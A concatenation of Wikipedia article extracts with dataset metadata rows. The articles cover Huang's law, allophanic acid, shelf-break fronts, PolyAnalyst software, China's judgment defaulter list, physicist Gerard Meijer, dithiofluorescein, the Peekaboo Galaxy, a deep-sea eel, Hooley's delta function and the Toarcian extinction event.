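Even by this rough measure, the claimed GPU trajectory compounds to several times what transistor-count doubling alone would deliver over the same window.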
Huang's law claims that a synergy between hardware, software, and artificial intelligence makes the new 'law' possible. "The innovation isn't just about chips," Huang said. "It's about the entire stack." He said that graphics processors especially are important to a new paradigm, and that eliminating bottlenecks can speed up the process and create advantages in reaching the goal. "Nvidia is a one trick pony," Huang has said. According to Huang: "Accelerated computing is liberating, … Let's say you have an airplane that has to deliver a package. It takes 12 hours to deliver it. Instead of making the plane go faster, concentrate on how to deliver the package faster, look at 3D printing at the destination." The object "… is to deliver the goal faster."
For artificial intelligence tasks, Huang said that training the convolutional network AlexNet took six days on two of Nvidia's GTX 580 processors to complete the training process but only 18 minutes on a modern DGX-2 AI server, resulting in a speed-up factor of 500. Compared to Moore's law, which focuses purely on CPU transistors, Huang's law describes a combination of advances in architecture, interconnects, memory technology, and algorithms.
Reception
Bharath Ramsundar wrote that deep learning is being coupled with "[i]mprovements in custom architecture". For example, machine learning systems have been implemented in the blockchain world, where Bitmain took on "many cryptocurrencies by designing custom mining ASICs (application-specific integrated circuits)", something that had previously been considered infeasible. "Nvidia's grand achievement however is in making the case that these improvements in architectures are not merely isolated victories for specific applications but perhaps broadly applicable to all of computer science." He has suggested that broad harnessing of GPUs and the GPU stack (cf. the CPU stack) can deliver "dramatic growth in deep learning architecture". The "magic" of Huang's law's promise is that, as nascent deep-learning-powered software becomes more widely available, the improvements from GPU scaling, and more generally from architectural improvements, will concretely improve the "performance and behavior of modern software stacks."
There has been criticism. Journalist Joel Hruska writing in ExtremeTech in 2020 said "there is no such thing as Huang's Law", calling it an "illusion" that rests on the gains made possible by Moore's law; and that it is too soon to determine a law exists. The research nonprofit Epoch has found that, between 2006 and 2021, GPU price performance (in terms of FLOPS/$) has tended to double approximately every 2.5 years, much slower than predicted by Huang's law.
See also
Accelerating change
List of eponymous laws
Notes
References
External links
2018 introductions
Computer architecture statements
Digital Revolution
History of computing hardware
Rules of thumb | Huang's law | [
"Technology"
] | 894 | [
"History of computing hardware",
"History of computing",
"Digital Revolution"
] |
65,382,854 | https://en.wikipedia.org/wiki/Allophanic%20acid | Allophanic acid is the organic compound with the formula H2NC(O)NHCO2H. It is a carbamic acid, the carboxylated derivative of urea. Biuret can be viewed as the amide of allophanic acid. The compound can be prepared by treating urea with sodium bicarbonate:
H2NC(O)NH2 + NaHCO3 → H2NC(O)NHCO2H + NaOH
The anionic conjugate base, H2NC(O)NHCO2−, is called allophanate. Salts of this anion have been characterized by X-ray crystallography. The allophanate anion is the substrate for the enzyme allophanate hydrolase.
Allophanate esters arise from the condensation of carbamates.
References
Ureas
Functional groups
Carbamates | Allophanic acid | [
"Chemistry"
] | 190 | [
"Organic compounds",
"Functional groups",
"Ureas"
] |
65,383,414 | https://en.wikipedia.org/wiki/Shelf-break%20front | Shelf-Break Fronts are a process by which stratification of the water column occurs. This stratification normally results in thermoclines, since they occur where a sudden change in water depth causes a constriction of the current flow. They can be expressed as a ratio of their potential energy due to maintaining mixed (non-stratified) conditions, to the dissipated energy produced by the current being forced across the sudden change in depth. This can be expressed as:
The energy terms can be expressed in very detailed equations, but with constant terms factored out, the important terms are water velocity (average velocity, ) and water depth (h).
The equation for the stratification index can be expressed as:

S = log₁₀( h / (C_D ū³) )

where C_D is a friction coefficient, approximated as 0.003 for a sandy bottom. This index can be calculated for any coastal region, usually in the range of +3 (highly stratified) to −2 (highly turbulent).
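For illustration, the index is easy to compute directly. The sketch below assumes the common Simpson–Hunter form S = log₁₀(h / (C_D ū³)), which matches the quantities described in this section (depth h, depth-averaged speed ū, and a friction coefficient near 0.003); the function name and example values are illustrative:

```python
import math

def stratification_index(depth_m, mean_speed_ms, friction_coeff=0.003):
    """Stratification index S = log10(h / (C_D * u**3)).

    depth_m        -- water depth h in metres
    mean_speed_ms  -- depth-averaged current speed u in m/s
    friction_coeff -- bottom friction coefficient C_D (~0.003, sandy bottom)
    """
    return math.log10(depth_m / (friction_coeff * mean_speed_ms ** 3))

# Deep, slow water stratifies; shallow, fast water stays mixed.
print(round(stratification_index(50.0, 0.5), 2))  # deeper/slower -> larger S
print(round(stratification_index(10.0, 2.0), 2))  # shallower/faster -> smaller S
```

Because the speed enters as a cube, modest changes in current strength move the index far more than comparable changes in depth.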
Reason to calculate
The stratification index for a shelf-break front is an indication of how productive phytoplankton will be. A stratification index of approximately 1.5 produces a nutrient-rich environment for the growth of phytoplankton. If the index is much higher, the stratified water column does not generate the upwelling of nutrients the phytoplankton need to prosper; if it is much lower, the water is too turbulent for the phytoplankton to use the nutrients available.
Stability of the front, in addition to nutrients, is a key to phytoplankton production.
An illustration of the stratification index for Narragansett Bay is shown here, with the average speeds estimated, using actual bathymetry for the bay and an estimated friction coefficient for silt, which composes much of the bay's bottom. Using the Stokes Spreadsheet, with some customization for the size of silt particles, a friction coefficient of 0.0011 was used. More accurate speed measurements and detailed values for the bay's bottom could yield a higher-fidelity image.
Notice the green color (a stratification index of approximately 1.5) along the edges of the Northern Bay and near some of the islands. These areas are favorable to the formation of algal blooms in the Narraganset Bay habitat due to the stratification index being approximately 1.5. Algae have been observed in high concentration in some of these areas, but not all of them.
Studies using flow cytometry have determined that the relative abundances of picophytoplankton (< 2 μm), small nanophytoplankton (2 to 10 μm) and large nanophytoplankton (10–20 μm) are greatly affected by the stratification index of the water column. Cell diversity was greatest in the presence of moderate levels of stratification.
If the turbulence is too high, their numbers remain stable or fall, but if there is no turbulence, their numbers also fall. It is postulated that the nutrient-rich boundary layer around each phytoplankton cell is not exhausted, but renewed, by a moderate level of turbulence.
References
Thermodynamics
Algae
Plankton
Narragansett Bay
Fluid dynamics
Water quality indicators | Shelf-break front | [
"Physics",
"Chemistry",
"Mathematics",
"Engineering",
"Biology",
"Environmental_science"
] | 682 | [
"Algae",
"Dynamical systems",
"Chemical engineering",
"Water pollution",
"Water quality indicators",
"Thermodynamics",
"Piping",
"Fluid dynamics"
] |
65,383,730 | https://en.wikipedia.org/wiki/PolyAnalyst | PolyAnalyst is a data science software platform developed by Megaputer Intelligence that provides an environment for text mining, data mining, machine learning, and predictive analytics. It is used by Megaputer to build tools with applications to health care, business management, insurance, and other industries. PolyAnalyst has also been used for COVID-19 forecasting and scientific research.
Overview
PolyAnalyst's graphical user interface contains nodes that can be linked into a flowchart to perform an analysis. The software provides nodes for data import, data preparation, data visualization, data analysis, and data export. PolyAnalyst includes features for text clustering, sentiment analysis, extraction of facts, keywords, and entities, and the creation of taxonomies and ontologies. PolyAnalyst supports a variety of machine learning algorithms, as well as nodes for the analysis of structured data and the ability to execute code in Python and R. PolyAnalyst also acts as a report generator, which allows the result of an analysis to be made viewable by non-analysts. It uses a client–server model and is licensed under a software as a service model.
Business Applications
Insurance
PolyAnalyst was used to build a subrogation prediction tool which determines the likelihood that a claim is subrogatable, and if so, the amount that is expected to be recovered. The tool works by categorizing insurance claims based on whether or not they meet the criteria that are needed for successful subrogation. PolyAnalyst is also used to detect insurance fraud.
Health care
PolyAnalyst is used by pharmaceutical companies to assist in pharmacovigilance. The software was used to design a tool that matches descriptions of adverse events to their proper MedDRA codes, determines if side effects are serious or non-serious, and to set up cases for ongoing monitoring if needed. PolyAnalyst has also been applied to discover new uses for existing drugs by text mining ClinicalTrials.gov, and to forecast the spread of the COVID-19 virus in the United States and Russia.
Business management
PolyAnalyst is used in business management to analyze written customer feedback including product review data, warranty claims, and customer comments. In one case, PolyAnalyst was used to build a tool which helped a company monitor its employees' conversations with customers by rating their messages for factors such as professionalism, empathy, and correctness of response. The company reported to Forrester Research that this tool had saved them $11.8 million annually.
SKIF Cyberia Supercomputer
PolyAnalyst is run on the SKIF Cyberia Supercomputer at Tomsk State University, where it is made available to Russian researchers through the Center for Collective Use (CCU). Researchers at the center use PolyAnalyst to perform scientific research and to manage the operations of their universities. In 2020, researchers at Vyatka State University (in collaboration with the CCU) performed a study in which PolyAnalyst was used to identify and reach out to victims of domestic violence through social media analysis. The researchers scraped the web for messages containing descriptions of abuse, and then classified the type of abuse as physical, psychological, economic, or sexual. They also constructed a chatbot to contact the identified victims of abuse and to refer them to specialists based on the type of abuse described in their messages. The data collected in this study was used to create the first ever Russian-language corpus on domestic violence.
References
External links
Text mining
Data mining and machine learning software
Reporting software
Software associated with the COVID-19 pandemic
Business software
Software frameworks
Text analysis
Proprietary software
Natural language processing software
Data analysis software
Data and information visualization software
Computing platforms
Data management software
Knowledge management
1994 software
Ontology editors
Windows software | PolyAnalyst | [
"Technology"
] | 766 | [
"Computing platforms"
] |
72,514,837 | https://en.wikipedia.org/wiki/Judgment%20defaulter | In China, judgment defaulter () or court defaulters, commonly known as laolai () or untrustworthy person (), is defined as a person who is able to fulfill legal obligations determined by the court, but has refused to do so, or illegally tries to evade enforcement such as hiding their assets.
According to the relevant regulations, persons who receive default judgment by the People's Courts are subject to restrictions on "high spending" or "high consumption" unrelated to basic living or business activities. These can include bans on traveling by high-speed train or on enrolling their children in private schools. Jeremy Daum, a senior research fellow at Yale Law School's Paul Tsai China Center, explains that since the majority of "court awards" are monetary, the "judgement defaulters" should not keep spending large sums while they have not yet paid the court award; instead, their money should be spent to "fix that problem".
Background
According to statistics from the Supreme People's Court, the number of the cases concluded by People's Courts at all levels from 2008 to 2012 in which the defendant had property, more than 70 percent of the defendants had evaded, avoided or even violently resisted enforcement, and less than 30 percent of them had automatically fulfilled their obligations. It is also reported that the chronic problems caused by the laolai have seriously affected the harmony and stability of society. To this end, at the end of August 2013, the Supreme People's Court issued Several Provisions on the Publication of Information on the List of Judgement Defaulters.
Inclusion procedure
Subject of disciplinary action
According to the Several Provisions of the Supreme People's Court on the Publication of Information on the List of Judgment Defaulters, adopted at the 1582nd meeting of the Judicial Committee of the Supreme People's Court on July 1, 2013, and amended at the committee's 1707th meeting on January 16, 2017, the people's courts at all levels shall list judgment defaulters and impose credit discipline on them in accordance with the law in the following circumstances:
Those who have the ability to perform but refuse to fulfill their obligations as determined by the legal instruments in force.
Obstructing or resisting judgment order by falsifying evidence, violence, threats, etc.
Evading judgment order by means of false litigation, false arbitration, concealing or transferring property.
Violation of the property reporting system.
Violation of consumption restriction order.
Refusing to fulfill the judgment order settlement agreement without justifiable reasons.
According to the Regulations, the period of inclusion in the list of judgment defaulters is two years. If the judgment defaulter has used violence or threats to obstruct or resist enforcement, if the circumstances are particularly serious, or if the defaulter has committed multiple breaches of trust, the period can be extended by one to three years. In addition, the people's courts at all levels shall not include the judgment defaulter in the list under any of the following circumstances, in accordance with the provisions of Article 1, paragraph 1:
Where sufficient and effective security has been provided.
Where the property is subject to seizure, attachment, freezing, etc. is sufficient to satisfy the debts determined by the legal documents in force.
Where the order of performance of the judgment defaulter is later, for which enforcement shall not be enacted according to law.
Other circumstances that do not belong to the ability to perform but refuse to fulfill the obligations determined by the effective legal documents.
In addition, if the judgment defaulter is a minor, the people's courts at all levels shall not include him/her in the list of judgment defaulters.
Information publicity
According to the Several Provisions of the Supreme People's Court on the Publication of Information on the List of Judgement Defaulters, the recorded and published information on the list of judgment defaulters shall include the following:
The name, unified social credit code (or organization code), and the name of the legal representative or person in charge of the legal person or other organization that is the defaulter.
The name, gender, age, and ID number of the natural person who is the judgment defaulter.
The obligations as determined by the effective legal documents and the performance of the judgment defaulter.
The specific circumstances of the judgment defaulter's breach of trust.
The production unit and document number of the basis of enforcement, the enforcement case number, the time of filing, and the enforcement court.
Other matters that the People's Court believes should be recorded and published that do not involve state secrets, commercial secrets, or personal privacy.
On October 24, 2013, the information publication and query platform for the list of judgment defaulters of the national courts (now China Defaulter Information Public Notification) was opened to the public. The public can input the name of a judgment defaulter to look up that person's information, and the above information is announced to the public. In addition, local courts can also publish information on the list of judgment defaulters through bulletin boards, newspapers, radio, television, the Internet, and press conferences. In recent years, some courts have also publicized judgment defaulters through screenings before films in cinemas, and have published list information through Douyin and other social media. In July 2014, the Executive Bureau of the Supreme People's Court and People's Daily Online jointly launched the Ranking of Judgment Defaulters.
Disciplinary measures
According to the Several Provisions of the Supreme People's Court on the Publication of Information on the List of Judgment Defaulters, judgment defaulters will be subject to credit discipline in government procurement, bidding and tendering, administrative approval, government support, financing and credit, market access, qualification recognition, and other areas. According to the Several Provisions of the Supreme People's Court on Restricting High Consumption by Judgment Defaulters, adopted at the 1487th session of the Judicial Committee of the Supreme People's Court on May 17, 2010, and amended at its 1657th meeting on July 6, 2015, persons (natural persons) included in the list of judgment defaulters shall not engage in the following acts of high consumption, or consumption not essential to life and work:
Traveling by airplane, in soft sleepers on trains, or in second-class or better cabins on ships.
High spending at star-rated hotels, nightclubs, golf courses, and similar venues.
Buying real estate or building new, expanded, or high-grade renovated houses.
Leasing high-grade office buildings, hotels, apartments and other places for office work.
Purchase of non-business essential vehicles.
Travel, vacation.
Children attending high-priced private schools.
Paying high premiums for insurance and financial products.
Riding in any seat on G-series high-speed trains, or in first-class or higher seats on other trains, and other consumption behavior not necessary for life and work. (The regulation applies to all train trips of China National Railway Group in the Mainland and Hong Kong.)
In addition to the above measures, judgment defaulters included in the list may have their housing, bank accounts, pensions, and mobile payment accounts (such as Alipay and WeChat Pay) frozen and seized. Judgment defaulters may not serve as the legal representative, director, supervisor, or senior manager of any company nationwide, and may not enroll their children in private schools; they are also restricted from trading stocks, leaving the country, and taking out loans or applying for credit cards at financial institutions. At the same time, vehicles registered to a defaulter are not allowed to drive on the expressways of the People's Republic of China; once such a vehicle enters or leaves an expressway toll booth, it will be stopped and transferred to the court by the highway enforcement brigade. According to Amendment (IX) to the Criminal Law of the People's Republic of China, implemented on November 1, 2015, those who have the ability to execute people's court judgments and rulings but refuse to do so are punished for the crime of refusing to execute a judgment or ruling: in serious circumstances, the penalty is imprisonment for up to three years, detention, or a fine; in particularly serious circumstances, imprisonment for more than three years and up to seven years, together with a fine.
Since July 2015, Zhima Credit, a subsidiary of Ant Group, and the Supreme People's Court have maintained a system connection to update data on judgment defaulters in real time. Once an Alipay user is included in the list of judgment defaulters, their Sesame Credit score is reduced, and their consumption and shopping at Sesame Credit's merchant partners are also restricted. In addition, some localities cooperate with telecommunications operators to set a special ringback tone on the defaulter's phone line, which cannot be canceled without the consent of the court; anyone calling a phone number registered to the defaulter hears a message warning that the owner is listed as a judgment defaulter. In Beijing, people included in the list of judgment defaulters are not allowed to participate in the license-plate lottery for small passenger cars.
According to a press conference held by the Supreme People's Court on July 10, 2018, as of that month there were 7.89 million published entries on the judgment defaulter list in mainland China, involving 4.4 million judgment defaulters. In terms of punishment, 12.22 million people had been restricted from purchasing air tickets, 4.58 million from purchasing tickets for bullet trains and high-speed trains, and 280,000 from serving as legal representatives and executives of enterprises. Nationwide, 2.8 million judgment defaulters fulfilled their obligations under the pressure of credit discipline.
Notable people
Prominent persons included in the list of judgment defaulters:
Huang Hongming, former chairman of Guangdong Chuang Hong Group. In 2014, he was listed on the list of judgment defaulters for violating the property reporting system
Jia Yueting, founder and former chairman of LeEco. Listed as a judgment defaulter by the Beijing Third Intermediate People's Court on December 11, 2017
Xu Zongheng, former mayor of the Shenzhen Municipal People's Government, was sentenced to a suspended death sentence for taking bribes in 2011. He was later included in the list of judgment defaulters by the Zhengzhou Central Court on July 17, 2018, for failing to fulfill his obligation to "forfeit all his personal property" as determined by the effective legal instrument
Sun Huahua, former chairman of the board of directors of Dahua New Material, a New Third Board company, applied for resignation as chairman of the board of directors in March 2018 due to personal inclusion as a judgment defaulter
Dai Wei, founder and CEO of OFO. Listed by the Beijing Haidian District People's Court on December 4, 2018, as a judgment defaulter
Michelle Ye, actress, was included in the list of judgment defaulters by the Shanghai Xuhui District People's Court in December 2018 and fined 80,000 yuan on March 5, 2019, for refusing to fulfill her obligations
Pang Qingnian, chairman of the board of directors of China Youth Automobile Group. As of May 2019, he had been listed as a judgment defaulter by the courts eight times
Shi Hongliu, the chairman of Hosa International, is listed by the court as a judgment defaulter
Jiang Peizhen, the founder and chairman of Golden Voice Holding Group Co., Ltd. Listed as a judgment defaulter by the Shanghai No. 1 Intermediate People's Court and the Ningbo Yinzhou District People's Court for defaulting on 51,949,800 yuan in advertising fees and failing to fulfill financial loan contracts
Luo Yonghao, CEO of Smartisan, was listed as a judgment defaulter by the court for failing to fulfill the payment obligations determined by the effective legal documents
Ma Ping (马平), CEO of Jiangsu Heryo Group and a Bentley owner. Listed as a judgment defaulter by Zhangjiagang City People's Court on July 16, 2019, for violating the property reporting system
See also
Default judgment
Blacklisting
Blacklist (employment)
Chinese social relations
Reputation capital
Reputation management
Reputation system
Social issues in China
Social Credit System
References
External links
NetEase: Hubei courts publish list of major judgment defaulters (網易-湖北法院公布重大老賴名單)
Credit
Mass surveillance
Data
Reputation management
Credit scoring
Nudge theory
Social status
Social systems
Social influence
Politics of China
Social information processing
Information society
Government by algorithm
Human rights abuses in China | Judgment defaulter | [
"Technology",
"Engineering"
] | 2,716 | [
"Information society",
"Government by algorithm",
"Automation",
"Information technology",
"Data",
"Computing and society"
] |
72,516,025 | https://en.wikipedia.org/wiki/Gerard%20Meijer | Gerardus Johannes Maria Meijer (born 1962 in Zeddam), more often Gerard J. M. Meijer is a Dutch physicist who has made significant contributions in the field of molecular physics, with a particular focus on laser-based spectroscopic detection techniques and cold molecules. His group invented the technique of Stark deceleration using the Stark effect for controlled generation of cold molecules.
Education and career
Meijer was born in Zeddam and attended high school in Doetinchem. He studied physics at Radboud University in Nijmegen from 1980, receiving his diploma in 1985 and his Ph.D. in Physics from the same university in 1988 under the supervision of Antoni Dymanus and Peter Andresen. After completing his Ph.D., Meijer spent a year as a post-doc at the IBM Research Center in San Jose, California, where he worked in the group of Mattanjah de Vries on laser desorption mass spectrometry and optical spectroscopy, as well as fullerenes. He then returned to Radboud University as a University Lecturer, where he continued his research on cavity ring-down spectroscopy and fullerene crystals.
In 1995, Meijer was appointed as a Full Professor in Experimental Physics at Radboud University, where he continued his research on laser-based spectroscopic techniques and cold molecules. He also became involved in molecular physics studies with IR-FEL (FELIX) radiation.
In 2000, Meijer was appointed as the Director of the FOM Institute for Plasma Physics "Rijnhuizen" in Nieuwegein, The Netherlands, where he continued his research on cold molecules and molecular physics studies with FELIX. In 2002, he was appointed as the Director of the Fritz Haber Institute of the Max Planck Society in Berlin, Germany, where he continued his research on gas-phase molecular physics, cold molecules, clusters, and biomolecules. In 2012, Meijer became an External Scientific Member of the Fritz Haber Institute and also took on the role of President of the Executive Board at Radboud University. In 2017, he returned to the directorship of the Fritz Haber Institute.
Honors and awards
Throughout his career, Meijer has received numerous awards and accolades for his contributions to the field of molecular physics, including the van't Hoff Prize from the German Bunsen Society in 2012 and the Bourke Award from the Royal Society of Chemistry in 2009. He was also elected a corresponding member of the Royal Netherlands Academy of Arts and Sciences in 2004 and a member of Academia Europaea in 2013.
References
1962 births
Dutch physicists
Members of Academia Europaea
Members of the Royal Netherlands Academy of Arts and Sciences
Academic staff of the Free University of Berlin
Academic staff of Radboud University Nijmegen
Max Planck Society people
Chemical physicists
20th-century Dutch physicists
Radboud University Nijmegen alumni
IBM people
Max Planck Institute directors
People from Montferland
Living people | Gerard Meijer | [
"Chemistry"
] | 605 | [
"Chemical physicists"
] |
72,516,446 | https://en.wikipedia.org/wiki/Dithiofluorescein | Dithiofluorescein (sometimes generically called thiofluorescein) is a complexometric indicator used in analytical chemistry. It changes from blue to colorless when it binds to mercury(2+) ions. It thus can indicate the endpoint in the titration of thiols using o-hydroxymercuribenzoic acid or its sodium salt. The reagent can be immobilized t in a polymer on a fiber optic, which might allow development of a detector for sulfide ions in a flow cell. Unlike fluorescein and other related fluoran dyes that have oxygen substituents on the benzene rings, dithiofluorescein, which has sulfur substituents, is not fluorescent.
References
Analytical reagents
Complexometric indicators
Triarylmethane dyes
Spiro compounds
Lactones
Thiols | Dithiofluorescein | [
"Chemistry",
"Materials_science"
] | 186 | [
"Thiols",
"Chromism",
"Organic compounds",
"Complexometric indicators",
"Analytical reagents",
"Spiro compounds"
] |
72,519,086 | https://en.wikipedia.org/wiki/Miriam%20Pe%C3%B1a%20C%C3%A1rdenas | Miriam del Carmen Peña Cárdenas is a Chilean astronomer and cosmochemist whose research includes the chemical composition of interstellar clouds including H II regions and the planetary nebulae surrounding Wolf–Rayet stars. She is a professor and researcher at the National Autonomous University of Mexico (UNAM), in the UNAM Institute of Astronomy.
Education
Peña began her university studies in Chile, studying engineering, but moved to the National Autonomous University of Mexico to complete her bachelor's degree, and remained there for her graduate studies.
Recognition
Peña is a member of the Mexican Academy of Sciences. She was a 2007 winner of UNAM's Sor Juana Inés de la Cruz Recognition.
References
External links
Year of birth missing (living people)
Living people
Chilean astronomers
Women astronomers
Astrochemists
National Autonomous University of Mexico alumni
Academic staff of the National Autonomous University of Mexico
Members of the Mexican Academy of Sciences | Miriam Peña Cárdenas | [
"Chemistry",
"Astronomy"
] | 180 | [
"Women astronomers",
"Astronomers",
"Astrochemists"
] |
72,519,436 | https://en.wikipedia.org/wiki/Peekaboo%20Galaxy | The Peekaboo Galaxy (officially known as HIPASS J1131-31 and PGC 5060432) is an irregular blue compact dwarf galaxy in the constellation Hydra. The galaxy is relatively small, at about across. It is also relatively nearby, at a distance of around from Earth. The Peekaboo Galaxy is considered one of the most metal-poor ("extremely metal-poor" (XMP)), least chemically enriched, and seemingly primordial, galaxies known.
Discovery
History of observation
The Peekaboo Galaxy was hidden behind a relatively fast-moving foreground star, named TYC 7215-199-1, but during the second half of the 20th century, the star moved aside, clearing the view to the obscured galaxy, which gave the galaxy its name.
Detailed studies of the galaxy were reported in November 2022, and were based on work using the Hubble Space Telescope. The astronomers were able to closely examine about 60 of the individual stars in the galaxy, all appearing relatively young, a few billion years old or younger. In the words of Bärbel Koribalski, astronomer at CSIRO in Australia, original discoverer of the galaxy in 2001, and coauthor of the 2022 study of the galaxy, "At first we did not realize how special this little galaxy is ... Now with combined data from the Hubble Space Telescope, the Southern African Large Telescope (SALT), and others, we know that the Peekaboo Galaxy is one of the most metal-poor galaxies ever detected."
According to current thinking, the first stars formed early in the history of the universe, 13.8 billion years ago, and were composed mostly of hydrogen and helium. These early stars fused their hydrogen and helium into heavier elements, up to and including iron. Elements heavier than iron were produced later, in violent supernova explosions that scattered the newly formed elements throughout the universe, where they were incorporated into newer generations of stars. The detection of the relatively close, extremely metal-poor Peekaboo Galaxy may therefore help astronomers better understand the formation of the earliest stars and galaxies.
Future studies
Karachentsev et al. write that the age of the Peekaboo Galaxy is "decidedly ambiguous".
Future further studies of the galaxy with the Hubble Space Telescope and the James Webb Space Telescope are being considered.
See also
Galaxy formation and evolution
I Zwicky 18
List of galaxies
Metallicity distribution function
Stellar classification
Stellar evolution
Stellar population
References
External links
Peekaboo Galaxy (video; 2:51) (NASA Space News; 12 December 2022)
Dwarf galaxies
Hydra (constellation) | Peekaboo Galaxy | [
"Astronomy"
] | 548 | [
"Hydra (constellation)",
"Constellations"
] |
72,519,458 | https://en.wikipedia.org/wiki/Saccopharynx%20berteli | Saccopharynx berteli is a species of ray-finned fish within the family Saccopharyngidae. It is known from a single holotype collected from the central Pacific Ocean through an open fishing net at a depth of in 1977. The individual caught was an immature male with a length of . It has been classified as a 'Data deficient' species by the IUCN Red List as there is little information regarding its population, ecology, distribution, and potential threats. It differs from the other nine species in the genus in morphometric characters, principally including the extreme elongation of the caudal region (88.5% of TL) compared with 71–82% in the other species.
References
Fish described in 2000
IUCN Red List data deficient species
Saccopharyngidae
Taxa named by Jørgen G. Nielsen
Deep sea fish
Species known from a single specimen
Fish of the Pacific Ocean | Saccopharynx berteli | [
"Biology"
] | 191 | [
"Individual organisms",
"Species known from a single specimen"
] |
72,520,168 | https://en.wikipedia.org/wiki/Hooley%27s%20delta%20function | In mathematics, Hooley's delta function (), also called Erdős--Hooley delta-function, defines the maximum number of divisors of in for all , where is the Euler's number. The first few terms of this sequence are
.
History
The sequence was first introduced by Paul Erdős in 1974, then studied by Christopher Hooley in 1979.
In 2023, Dimitris Koukoulopoulos and Terence Tao proved an upper bound on the partial sums of the sequence, and hence on the average order of the function.
Later in 2023, Kevin Ford, Koukoulopoulos, and Tao proved a corresponding lower bound on the partial sums.
Usage
This function measures the tendency of divisors of a number to cluster.
The growth of this sequence is limited by the number of divisors: 1 ≤ Δ(n) ≤ d(n), where d(n) is the number of divisors of n.
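As an illustration of the definition, Δ(n) can be computed for small n by brute force. The sketch below is not taken from the cited literature; it relies on the observation that the count of divisors in (u, eu] can only increase as u rises past u = d/e for some divisor d, so those values of u suffice as candidates.

```python
import math

def hooley_delta(n: int) -> int:
    """Brute-force Hooley delta function: the maximum number of divisors
    of n lying in an interval (u, e*u], taken over all real u > 0."""
    divisors = [d for d in range(1, n + 1) if n % d == 0]
    # The divisor count in (u, e*u] only increases when e*u reaches a
    # divisor d, i.e. at u = d/e, so checking those intervals suffices.
    return max(
        sum(1 for dd in divisors if d / math.e < dd <= d)
        for d in divisors
    )
```

For example, hooley_delta(12) returns 3, realised by the divisors 2, 3, and 4, which all fit in a single interval of the form (u, eu]; this also shows the clustering tendency the function measures.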
See also
Divisor function
Euler's number
References
Divisor function
Arithmetic functions
Number theory
Integer sequences | Hooley's delta function | [
"Mathematics"
] | 202 | [
"Sequences and series",
"Discrete mathematics",
"Integer sequences",
"Mathematical structures",
"Recreational mathematics",
"Arithmetic functions",
"Mathematical objects",
"Combinatorics",
"Numbers",
"Number theory"
] |
72,520,525 | https://en.wikipedia.org/wiki/Amanita%20subnudipes | Amanita subnudipes is a species of Amanita found in Italy.
References
External links
subnudipes
Fungi of Europe
Fungus species | Amanita subnudipes | [
"Biology"
] | 32 | [
"Fungi",
"Fungus species"
] |
72,521,404 | https://en.wikipedia.org/wiki/Toarcian%20Oceanic%20Anoxic%20Event | The Toarcian extinction event, also called the Pliensbachian-Toarcian extinction event, the Early Toarcian mass extinction, the Early Toarcian palaeoenvironmental crisis, or the Jenkyns Event, was an extinction event that occurred during the early part of the Toarcian age, approximately 183 million years ago, during the Early Jurassic. The extinction event had two main pulses, the first being the Pliensbachian-Toarcian boundary event (PTo-E). The second, larger pulse, the Toarcian Oceanic Anoxic Event (TOAE), was a global oceanic anoxic event, representing possibly the most extreme case of widespread ocean deoxygenation in the entire Phanerozoic eon. In addition to the PTo-E and TOAE, there were multiple other, smaller extinction pulses within this span of time.
Occurring during the supergreenhouse climate of the Early Toarcian Thermal Maximum (ETTM), the Early Toarcian extinction was associated with large igneous province volcanism, which elevated global temperatures, acidified the oceans, and prompted the development of anoxia, leading to severe biodiversity loss. The biogeochemical crisis is documented by high-amplitude negative carbon isotope excursions, as well as by black shale deposition.
Timing
The Early Toarcian extinction event occurred in two distinct pulses, with the first pulse regarded by some authors as a separate event unrelated to the more extreme second pulse. The first, more recently identified pulse occurred during the mirabile subzone of the tenuicostatum ammonite zone, coinciding with a slight drop in oxygen concentrations and the beginning of warming following a late Pliensbachian cool period. This first pulse, occurring near the Pliensbachian-Toarcian boundary, is referred to as the PTo-E. The TOAE itself occurred near the tenuicostatum–serpentinum ammonite biozonal boundary, specifically in the elegantulum subzone of the serpentinum ammonite zone, during a marked, pronounced warming interval. The TOAE lasted for approximately 500,000 years, though estimates ranging from 200,000 to 1,000,000 years have also been given. The PTo-E primarily affected shallow water biota, while the TOAE was the more severe event for organisms living in deep water.
Causes
Geological, isotopic, and palaeobotanical evidence suggests the late Pliensbachian was an icehouse period. These ice sheets are believed to have been thin and stretched into lower latitudes, making them extremely sensitive to temperature changes. A warming trend lasting from the latest Pliensbachian to the earliest Toarcian was interrupted by a "cold snap" in the middle polymorphum zone, equivalent to the tenuicostatum ammonite zone, which was then followed by the abrupt warming interval associated with the TOAE. This global warming, driven by rising atmospheric carbon dioxide, was the mainspring of the early Toarcian environmental crisis. Carbon dioxide levels rose from about 500 ppm to about 1,000 ppm. Seawater warmed by anywhere between 3 °C and 7 °C, depending on latitude. At the height of this supergreenhouse interval, global sea surface temperatures (SSTs) averaged about 21 °C.
The eruption of the Karoo-Ferrar Large Igneous Province is generally believed to have caused the surge in atmospheric carbon dioxide levels. Argon-argon dating of Karoo-Ferrar rhyolites points to a link between Karoo-Ferrar volcanism and the extinction event, a conclusion reinforced by uranium-lead dating and palaeomagnetism. Occurring during a broader, gradual positive carbon isotope excursion as measured by δ13C values, the TOAE is preceded by a global negative δ13C excursion recognised in fossil wood, organic carbon, and carbonate carbon in the tenuicostatum ammonite zone of northwestern Europe, with this negative δ13C shift being the result of volcanic discharge of light carbon. The global ubiquity of this negative δ13C excursion has been called into question, however, due to its absence in certain deposits from the time, such as the Bächental bituminous marls, though its occurrence in areas like Greece has been cited as evidence of its global nature. The negative δ13C shift is also known from the Arabian Peninsula, the Ordos Basin, and the Neuquén Basin. The negative δ13C excursion has been found to be up to −8‰ in bulk organic and carbonate carbon, although analysis of compound-specific biomarkers suggests a global value of around −3‰ to −4‰. In addition, numerous smaller scale carbon isotope excursions are globally recorded on the falling limb of the larger negative δ13C excursion. Although the PTo-E is not associated with a decrease in δ13C analogous to the TOAE's, volcanism is nonetheless believed to have been responsible for its onset as well, with the carbon injection most likely having an isotopically heavy, mantle-derived origin. The Karoo-Ferrar magmatism released so much carbon dioxide that it disrupted the imprint of the 9 Myr long-term carbon cycle that was otherwise steady and stable during the Jurassic and Early Cretaceous.
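The δ13C values discussed above are per-mille deviations of a sample's 13C/12C ratio from a reference standard (conventionally VPDB). A minimal sketch of that conversion follows; the default standard ratio is an approximate VPDB value, assumed here purely for illustration.

```python
def delta13c(r_sample: float, r_standard: float = 0.011180) -> float:
    """delta-13C in per mille (permil): the relative deviation of a
    sample's 13C/12C ratio from a reference standard. The default
    standard ratio approximates VPDB (an assumption for illustration)."""
    return (r_sample / r_standard - 1.0) * 1000.0
```

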